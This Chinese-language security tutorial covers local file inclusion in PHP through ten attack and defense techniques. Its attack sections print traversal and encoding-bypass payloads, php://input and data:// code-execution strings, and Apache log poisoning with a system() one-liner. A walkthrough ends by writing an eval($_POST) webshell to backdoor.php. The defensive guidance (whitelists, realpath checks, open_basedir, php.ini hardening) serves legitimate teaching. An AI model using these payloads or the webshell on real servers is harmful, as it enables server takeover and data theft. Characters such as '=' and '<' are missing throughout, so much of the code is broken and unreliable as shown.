1. 项目概述为什么LFI漏洞至今仍是“心头大患”干了这么多年安全我依然觉得本地文件包含Local File Inclusion LFI是Web安全里最“经典”也最容易被低估的漏洞之一。说它经典是因为从PHP的include、require到JSP的jsp:include再到各种模板引擎文件包含的逻辑几乎贯穿了Web开发的各个角落。说它容易被低估是因为很多开发者和初级安全测试人员觉得不就是读个文件嘛危害能有多大这种想法大错特错。一个成功的LFI利用往往是从读取配置文件、日志文件开始最终演变成远程代码执行RCE直接拿下服务器权限的“高速公路”。我见过太多这样的案例一个看似无害的?pageabout.php参数因为后端代码没有做好过滤攻击者稍微变通一下就能读到/etc/passwd进而读取Web应用的数据库配置文件再结合日志注入或PHP封装协议最终在服务器上执行任意命令。整个过程行云流水防不胜防。所以今天这篇指南我想从一个实战老手的角度抛开那些教科书式的定义直接切入攻防两端最核心的10个实战技巧。这些技巧有些是攻击时“一剑封喉”的利器有些则是防守时“固若金汤”的基石。无论你是想深入理解漏洞原理的安全研究员还是负责代码审计的开发工程师或是正在打CTF、挖SRC的渗透测试人员相信都能从中找到直接能用的“干货”。2. 核心思路拆解LFI漏洞的攻防本质是什么要打好攻防战首先得理解战场。LFI漏洞的核心在于应用程序动态包含文件时使用了用户可控的输入作为文件路径的一部分且未经过严格的验证和过滤。攻击者的目标很明确突破程序预期的文件包含范围访问或执行系统上的敏感文件。而防守方的目标同样清晰将文件包含的操作严格限制在预设的安全边界内。2.1 攻击视角从路径遍历到代码执行的跃迁攻击思路通常是一个阶梯式的过程我把它称为“LFI利用三部曲”基础信息收集与验证首先需要确认漏洞是否存在。经典的测试payload就是../../../../etc/passwd。如果返回了系统的用户列表那恭喜你漏洞实锤。这一步的关键在于确定应用程序的当前工作目录、使用的操作系统Windows还是Linux以及过滤机制如果有的话。敏感文件读取与权限提升在确认漏洞后攻击者会系统地读取一系列敏感文件以获取进一步攻击的“弹药”。这包括配置文件如Web应用的config.php、database.ini系统的/etc/shadow需root权限。日志文件如Web服务器的访问日志/var/log/apache2/access.log、错误日志或应用自定义的日志。这是实现RCE的关键跳板。会话文件PHP的/tmp/sess_[sessionid]如果会话数据可控可能包含恶意代码。源码文件通过包含自身或其他PHP文件有时可以绕过某些过滤或利用php://filter协议读取源码。实现远程代码执行RCE这是LFI攻击的终极目标。主要途径有日志文件注入将PHP代码作为User-Agent或请求参数的一部分使其被记录到Web服务器日志中然后通过LFI包含该日志文件。利用PHP封装协议php://input允许读取POST原始数据php://filter可以用于编码和解码文件内容有时能绕过死亡代码或直接执行。利用环境与临时文件如/proc/self/environ环境变量、上传临时文件等在特定条件下可被利用。2.2 防御视角构建多维度的安全边界防守不是简单地堵上一个点而是构建一个立体的防御体系输入白名单这是最有效、最根本的方法。如果可能不要让用户输入任何文件路径。如果必须则使用一个预定义的映射表例如数组[‘home’ ‘./templates/home.php’ ‘about’ ‘./templates/about.php’]只允许用户选择键名程序根据键名映射到固定的安全路径。严格的路径规范化与过滤如果白名单不可行则必须对输入进行严格的净化。这包括去除目录遍历序列../..\、将输入限制在特定目录内使用basename()或确保完整路径以安全的基础目录开头、避免使用空字节截断在PHP 5.3.4以上已修复但其他语言或旧系统仍需注意。降低权限与安全配置以最小权限运行Web服务器进程确保其无法读取系统关键文件如/etc/shadow。正确配置Web服务器如Apache的php_admin_value限制open_basedir和PHP环境关闭危险函数如allow_url_include。纵深防御与监控即使应用层防护被绕过系统层和网络层的防护如文件系统权限、WAF、IDS/IPS也能提供额外的保护。同时监控异常的日志读取行为如大量../序列的请求也是及时发现攻击的重要手段。理解了攻防两端的核心思路我们才能有的放矢地运用接下来的具体技巧。3. 10个本地文件包含漏洞实战技巧详解下面这10个技巧是我从大量实战和CTF比赛中总结出来的精华。我会按照从基础到进阶从攻击到防御的顺序来讲解每个技巧都会配上原理分析和实战场景。3.1 技巧一经典路径遍历与空字节截断的“遗产利用”这是LFI最基础的攻击方式但在一些老旧系统或特定场景下依然有效。攻击操作# Linux/Unix 系统 vulnerable.php?page../../../etc/passwd vulnerable.php?page../../../../var/www/html/config.php # Windows 系统 (注意方向) vulnerable.php?page..\..\..\windows\win.ini # 空字节截断 (针对PHP 5.3.4前的版本或某些C语言程序) vulnerable.php?page../../../etc/passwd%00 vulnerable.php?page../../../etc/passwd\0原理与场景应用程序使用类似include($_GET[‘page’] . ‘.php’);的代码。攻击者通过输入../../../etc/passwd%00%00空字节在C语言字符串处理中表示结束。拼接后成为../../../etc/passwd\0.php系统在遇到\0时认为字符串结束从而成功包含/etc/passwd忽略了后面的.php。注意PHP在5.3.4版本后默认修复了%00截断但在审计遗留系统或非Web应用如某些本地服务时仍需留意。防御对策使用realpath()函数解析完整路径并与白名单或基础目录进行比较。使用basename()获取文件名但注意它不防止目录遍历basename(‘../../../etc/passwd’)返回passwd。最推荐实施白名单机制。注意空字节截断在现代PHP环境中基本已失效但了解它对于审计历史代码和理解漏洞演变至关重要。切勿在新项目中尝试依赖它进行防护。3.2 技巧二利用PHP封装协议实现源码泄露与绕过PHP内置的多种封装协议Wrapper是LFI攻击中的“瑞士军刀”功能强大。攻击操作# 1. php://filter 读取源码最常用 # 读取指定PHP文件的Base64编码内容避免被直接执行 vulnerable.php?pagephp://filter/convert.base64-encode/resourceindex.php vulnerable.php?pagephp://filter/readconvert.base64-encode/resourceconfig.php # 组合使用多个过滤器 vulnerable.php?pagephp://filter/convert.iconv.utf-8.utf-16/resourceindex.php # 2. php://input 执行POST代码需allow_url_includeOn # POST请求体?php system(id); ? vulnerable.php?pagephp://input # 3. data:// 协议执行代码需allow_url_includeOn vulnerable.php?pagedata://text/plain,?php phpinfo();? vulnerable.php?pagedata://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8原理与场景php://filter它不对文件内容进行PHP解析而是将其作为数据流进行处理。因此我们可以用它来读取PHP文件的源代码否则直接包含.php文件会导致代码被执行我们看不到源码。convert.base64-encode过滤器将输出编码便于在HTTP响应中查看。php://input允许读取POST请求的原始数据。如果包含它POST数据会被当作PHP代码执行。data://直接嵌入数据作为文件内容。 这些协议在代码审计、CTF中极为常见特别是php://filter/convert.base64-encode/resource几乎成了读取源码的标准姿势。防御对策在php.ini中设置allow_url_include Off和allow_url_fopen Off。这是最重要的全局防护措施。在代码中可以检查用户输入是否以php://、data://、phar://等危险协议开头。同样白名单是最彻底的解决方案。3.3 技巧三日志文件注入与RCE的经典组合拳这是将LFI转化为RCE最经典、最可靠的路径之一尤其是在allow_url_include关闭的情况下。攻击操作确定日志路径首先利用LFI读取Web服务器配置文件如/etc/apache2/apache2.conf或通过错误信息推测找到访问日志路径常见的有/var/log/apache2/access.log、/var/log/nginx/access.log、/var/log/httpd/access_log。污染日志向服务器发送一个包含PHP代码的HTTP请求让代码被记录到日志中。# 使用curl或浏览器插件在User-Agent中注入代码 curl -A ?php system(\$_GET[cmd]);? http://target/vulnerable.php?pagetest # 或者如果GET/POST参数也被记录也可以注入 http://target/vulnerable.php?pagetest?php phpinfo();?包含日志文件通过LFI漏洞包含这个已经被污染的日志文件。vulnerable.php?page/var/log/apache2/access.log执行命令如果注入的代码是system(\$_GET[‘cmd’]);那么现在就可以通过传递cmd参数来执行命令了。vulnerable.php?page/var/log/apache2/access.logcmdid原理与场景Web服务器会将HTTP请求的细节如URL、User-Agent、Referer等明文记录到日志文件中。如果我们能将PHP代码注入到这些字段中日志文件就变成了一个存储PHP代码的文本文件。再通过LFI包含这个日志文件其中的PHP代码就会被解析执行。关键在于日志文件对Web进程可读且通常位于已知路径。防御对策移动或保护日志文件将Web日志文件移动到Web根目录之外或设置严格的权限如640属主root组www-data仅允许www-data读。日志内容过滤对记录到日志中的User-Agent、Referer等字段进行过滤转义或删除特殊字符如?php、?。限制文件包含范围通过open_basedir将PHP可访问的文件限制在特定目录排除日志目录。3.4 技巧四利用/proc文件系统与进程环境Linux的/proc是一个虚拟文件系统提供了访问内核和进程信息的接口。其中一些接口可能被利用。攻击操作# 1. 读取当前进程的环境变量可能包含敏感信息或Web路径 vulnerable.php?page/proc/self/environ # 如果环境变量中有HTTP_USER_AGENT等我们可以污染它类似日志注入 # 然后包含 /proc/self/environ # 2. 通过 /proc/self/fd/ 目录访问文件描述符 # 例如如果应用打开了某个文件可能能在fd目录下找到它 # 但这需要一定的运气和枚举原理与场景/proc/self/environ文件包含了当前进程即处理请求的PHP-FPM或Apache进程的所有环境变量。如果攻击者能通过某种方式如修改User-Agent并确保其被写入环境变量注入PHP代码再包含此文件就可能执行代码。不过现代Web服务器环境通常不会将HTTP头直接映射为有执行权限的环境变量此技巧成功率已降低但在某些特定配置或CTF题目中仍会出现。防御对策确保Web服务进程以隔离的环境运行如使用Docker容器限制对/proc文件系统的访问。在PHP配置中open_basedir同样可以限制对/proc的访问尽管不是所有情况都有效。保持系统内核和运行环境更新。3.5 技巧五Session文件包含与利用PHP的Session机制也可能成为LFI到RCE的桥梁。攻击操作获取Session ID通过Cookie中的PHPSESSID获取或如果应用将会话ID暴露在URL中则更容易。猜测或获取Session文件路径PHP Session文件默认存储在/tmp、/var/lib/php/sessions等目录文件名通常为sess_[sessionid]。路径可通过phpinfo()或包含错误信息泄露。向Session中注入代码如果应用将用户可控的数据如用户名、邮箱存储到$_SESSION中我们就可以通过修改这些数据来注入PHP代码。包含Session文件利用LFI包含这个Session文件如/tmp/sess_abc123。原理与场景PHP Session文件是存储在服务器上的文本文件内容通常是序列化的$_SESSION数组。如果我们可以控制存入Session的某个值并将其设置为?php phpinfo();?那么这个Session文件就包含了可执行代码。包含它即可触发RCE。难点在于需要知道Session ID和文件存储路径并且要有向Session写入数据的能力。防御对策安全存储Session将会话数据存储到数据库中使用session_set_save_handler而不是文件系统中。严格校验Session数据对存入$_SESSION的所有用户数据进行严格的过滤和校验。设置安全的Session路径使用session.save_path将会话文件存储在Web根目录之外并设置合适的权限。3.6 技巧六文件上传与包含的联动攻击这是非常危险的组合漏洞。如果网站存在文件上传功能但上传的文件被重命名如改为.jpg后缀或移动到非Web目录单纯的LFI可能无法直接执行上传的恶意文件。但结合LFI情况就不同了。攻击操作上传一个包含PHP代码的图片文件图片马在图片的EXIF信息或文件末尾嵌入?php phpinfo();?。利用文件包含漏洞包含这个上传的图片即使它被重命名为.jpg只要服务器配置不当如未禁用php引擎对.jpg文件的解析或者我们利用php://filter等协议仍然可能执行其中的代码。vulnerable.php?page./uploads/evil.jpg # 或者如果服务器解析了.jpg中的PHP代码原理与场景这种攻击利用了服务器对文件内容类型的错误判断。如果服务器仅根据文件扩展名来限制上传类型但Web服务器如Apache配置了AddType application/x-httpd-php .php .jpg之类的规则那么.jpg文件也会被PHP解析器执行。LFI漏洞则提供了触发这个解析的入口。防御对策上传文件白名单只允许上传特定的、安全的文件扩展名如.jpg.png.pdf并在后端使用MIME类型或文件头特征进行二次校验而非仅信客户端提交的扩展名。重命名与隔离对上传的文件进行随机重命名如UUID并存储在Web根目录以外的位置。通过后端脚本而非直接文件访问来提供下载或展示。禁用危险解析在Web服务器配置中确保不会将PHP解析器关联到图片等静态文件扩展名上。3.7 技巧七编码与双重编码绕过过滤当开发人员意识到LFI风险并尝试进行过滤时他们可能会使用简单的字符串替换或黑名单。这时编码技术就派上了用场。攻击操作# 假设过滤了 ../ # 1. URL编码 vulnerable.php?page..%2f..%2fetc%2fpasswd # %2f 是 / 的URL编码 # 2. 双重URL编码 vulnerable.php?page%252e%252e%252f%252e%252e%252fetc%252fpasswd # %25 是 % 的URL编码。所以 %252e 被解码一次后变成 %2e 再解码一次变成 . # 3. UTF-8 Unicode 编码 / 其他编码 # 在某些解析器里可能有效 vulnerable.php?page%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd # 4. 使用绝对路径绕过如果未限制绝对路径且进程有权访问 vulnerable.php?page/etc/passwd原理与场景应用程序的过滤逻辑可能在解码操作之前或之后执行。例如代码先使用str_replace(‘../’ ‘’ $input)进行过滤然后才进行urldecode()。那么输入..%2f经过过滤后变成%2f解码后就成了/成功绕过了过滤。双重编码则是针对进行了多次解码的场景。防御对策规范化后再过滤在过滤前先对输入进行完整的URL解码或相应的解码并将其规范化如使用realpath()或自定义函数解析所有..和.。采用白名单而非黑名单黑名单永远有被绕过的风险。白名单是唯一可靠的方法。使用安全的API如PHP的basename()仅获取文件名或结合realpath()与基础目录进行校验。3.8 技巧八自动化Fuzz与字典构建在实战渗透测试中手动测试效率低下。我们需要借助自动化工具和精心准备的字典。攻击操作使用工具ffufwfuzzBurp Suite Intruder是常用的Fuzz工具。构建高效字典字典内容不应只是简单的../../../etc/passwd而应分层级、分场景。路径遍历深度字典..../../../../../../ … 直到../../../../../../../../敏感文件字典包含Linux和Windows的常见敏感文件路径。/etc/passwd /etc/shadow /etc/hosts /etc/issue /proc/self/environ /var/log/apache2/access.log /var/www/html/config.php C:\Windows\System32\drivers\etc\hosts C:\boot.ini (旧系统)协议与包装字典php://filter/convert.base64-encode/resourceindex.phpdata://expect://等。编码Payload字典将上述payload进行URL编码、双重编码后的变体。Fuzz策略先进行简单路径遍历测试发现漏洞后再用敏感文件字典进行深入探测。同时注意观察响应长度、状态码和内容的变化。原理与场景自动化Fuzz可以快速、批量地测试大量可能的payload覆盖各种边界情况和绕过技巧极大提高漏洞发现的效率和深度。防御对策防御方同样可以思考攻击者的Fuzz模式在WAF或应用层部署相应的规则检测异常的路径遍历序列和敏感文件访问请求。3.9 技巧九防御性编程与安全函数使用指南开发者视角作为开发者如何在代码层面根除LFI漏洞以下是一些黄金法则。防御操作与代码示例绝对首选白名单机制$allowed_pages [ home ./templates/home.php, about ./templates/about.php, contact ./templates/contact.php, ]; $page $_GET[page] ?? home; if (!array_key_exists($page, $allowed_pages)) { $page home; // 或返回404 } include($allowed_pages[$page]);次选严格限制在基础目录内如果必须动态$base_dir /var/www/html/templates/; // 必须以/结尾 $user_input $_GET[file]; // 移除所有的../和./防止目录遍历 $user_input str_replace([../, ./], , $user_input); // 或者更严格禁止任何目录分隔符 // $user_input basename($user_input); $full_path realpath($base_dir . $user_input); // 关键检查确保解析后的路径仍然在基础目录内 if ($full_path false || strpos($full_path, $base_dir) ! 0) { die(Invalid file path.); } // 还可以检查文件扩展名是否为.php if (pathinfo($full_path, PATHINFO_EXTENSION) ! php) { die(Invalid file type.); } include($full_path);避免使用动态包含从根本上重新设计使用路由控制器如index.php?actionhome配合固定的模板渲染逻辑而不是直接包含文件。原理与场景白名单将用户选择限制在有限的、预定义的选项内从根本上消除了用户输入不可控路径的可能性。如果做不到白名单则必须进行严格的路径校验核心是使用realpath()解析出绝对路径然后检查这个绝对路径是否以我们设定的安全基础目录开头。str_replace过滤是不安全的因为....//可能被绕过。实操心得绝对不要信任任何用户输入这是安全的第一原则。对于文件路径realpath()是你的好朋友但一定要记得和基础路径做前缀比较。strpos($full_path, $base_dir) 0这个检查至关重要它确保了文件不会“逃出”你设定的安全沙箱。另外记得realpath()在文件不存在时会返回false要做好错误处理。3.10 技巧十服务器与语言环境加固配置清单应用层防御之外系统层和运行环境的加固同样重要这构成了纵深防御的第二道、第三道防线。防御操作PHP配置 (php.ini)allow_url_fopen Offallow_url_include Off(重中之重)open_basedir /var/www/html将PHP可访问的文件限制在Web目录disable_functions execsystemshell_execpassthru...根据实际需要禁用危险函数session.save_path /path/outside/webroot将会话文件移出Web目录Web服务器配置Apache: 在虚拟主机或目录配置中使用php_admin_value来覆盖php.ini设置例如php_admin_value open_basedir “/var/www/html”。Nginx PHP-FPM: 在PHP-FPM池配置文件(www.conf)中设置php_admin_value[open_basedir]/var/www/html。为Web服务进程如www-data用户设置最小权限原则确保其不能读取/etc/shadow等系统关键文件。文件系统权限Web根目录文件权限设置为644所有者可读写其他人只读。Web根目录文件夹权限设置为755。配置文件、日志文件等敏感文件应放在Web根目录外权限设置为640所有者读写同组用户只读属主为root组为www-data。使用Web应用防火墙WAF部署WAF规则拦截包含大量../、etc/passwd、php://等特征的恶意请求。原理与场景这些配置从不同层面缩小了攻击面。open_basedir像一堵墙把PHP脚本关在指定的院子里。禁用allow_url_include锁死了利用远程和伪协议执行代码的大门。最小权限原则确保即使应用被攻破攻击者能做的事情也非常有限。WAF则提供了基于流量特征的实时防护。实操心得安全配置不是一劳永逸的需要定期审查和更新。特别是在使用Docker等容器技术时很容易把包含危险配置的镜像跑起来。我的习惯是建立一个“安全基线配置清单”在每次部署新环境时逐项核对。open_basedir虽然有效但并非万能有些PHP函数可以绕过它因此不能完全依赖。它应该与白名单等应用层防护结合使用。4. 实战攻防演练从一个简单漏洞到服务器沦陷让我们通过一个虚构但高度贴近现实的场景串联运用上述多个技巧。场景发现一个站点http://target.com/index.php?filewelcome.php 存在LFI漏洞。初步验证http://target.com/index.php?file../../../../etc/passwd返回了用户列表漏洞确认。同时发现系统是Linux。读取Web配置寻找日志路径http://target.com/index.php?filephp://filter/convert.base64-encode/resourceindex.php解码后分析源码发现是简单的include($_GET[‘file’] . ‘.html’);。同时从源码或错误信息中未找到日志路径。http://target.com/index.php?file../../../../etc/apache2/sites-available/000-default.conf成功读取Apache虚拟主机配置发现日志路径为/var/log/apache2/target-access.log。日志注入RCEcurl -A “?php system(\$_GET[‘c’]);?” “http://target.com/index.php?filetest.html”然后包含日志文件http://target.com/index.php?file/var/log/apache2/target-access.logcid成功执行了id命令返回了Web进程的用户信息如www-data。建立持久化后门 通过RCE写入一个Webshell。http://target.com/index.php?file/var/log/apache2/target-access.logcecho ‘?php eval($_POST[“cmd”]);?’ /var/www/html/backdoor.php现在可以直接访问http://target.com/backdoor.php并用POST传递cmd参数执行命令。权限提升与横向移动略涉及其他漏洞利用尝试读取/etc/shadow需要root利用内核漏洞或SUID程序进行提权。从这个过程可以看出一个简单的LFI如何通过读取源码、定位日志、注入代码、包含日志一步步演变成严重的RCE最终导致服务器失陷。防守方如果在任何一个环节如设置open_basedir、移动日志文件、过滤User-Agent设置了有效的障碍攻击链就可能中断。5. 常见问题排查与防御误区在实际开发和防御中经常会遇到一些典型问题和错误认知。Q1我用了basename()函数是不是就安全了A1不完全安全。basename(‘../../../etc/passwd’)确实返回passwd但它只去除了路径不防止目录遍历。如果代码是include(‘./templates/’ . basename($input)); 那么传入../../../etc/passwd会包含./templates/passwd如果恰好存在这个文件就可能被包含。但它确实阻止了直接的路径穿越。最佳实践是结合白名单或基础目录校验。Q2设置了open_basedir就高枕无忧了吗A2不是。open_basedir是PHP层面的限制但有些PHP函数和扩展如通过ImageMagick、FFmpeg执行命令可能绕过它。它应该作为一道重要的补充防线而非唯一防线。Q3攻击请求里没有../是不是就不是LFI攻击A3不一定。攻击者可能使用编码、绝对路径、或者利用php://filter等协议。因此防御规则不能只检测../。Q4我们的应用是Java/Python/Node.js写的是不是没有LFI问题A4任何语言只要存在动态加载文件如includerequireimportopen且用户输入影响路径就可能存在类似问题。例如Java的JSP的jsp:include Python的open() Node.js的fs.readFile()。原理相通只是具体函数和利用方式略有差异。Q5在代码审计中如何快速定位潜在的LFI漏洞点A5搜索关键词includerequireinclude_oncerequire_oncePHPFileInputStreamnew File()Javaopen()read_file()Pythonfs.readFilerequire()Node.js。重点关注这些函数/语句的参数是否直接或间接来自用户输入$_GET$_POST$_REQUEST$_COOKIE等。防御误区误区1只过滤../和..\攻击者会使用编码、双重编码、绝对路径等方式绕过。误区2使用黑名单过滤php://等协议协议列表可能不全且可能有新的协议或变种。误区3依赖Web服务器如Nginx的路径限制如果PHP代码本身有漏洞Nginx的location规则可能无法阻止包含Web目录外的文件因为PHP是后端解析的。误区4认为非PHP应用没有此问题如前所述这是逻辑漏洞与语言无关。本地文件包含漏洞如同一把隐藏在寻常功能下的“万能钥匙”攻击者一旦获得它就能在服务器的文件系统中逐步摸索直至找到打开最高权限之门的路径。攻防的较量本质上是对系统理解深度和细节把握程度的较量。对于攻击者需要熟练掌握路径遍历、协议利用、日志注入等技巧并善于将它们组合运用。对于防御者则必须树立“永不信任用户输入”的核心思想采用白名单作为终极手段辅以严格的路径校验、安全的服务器配置和最小权限原则构建起纵深防御体系。希望这10个实战技巧和背后的原理分析能帮助你无论是作为攻击方更精准地测试还是作为防御方更牢固地建设都能在LFI这个经典的战场上做到游刃有余。记住安全是一个持续的过程没有一劳永逸的解决方案唯有持续学习、实践和反思才能跟上不断变化的攻防节奏。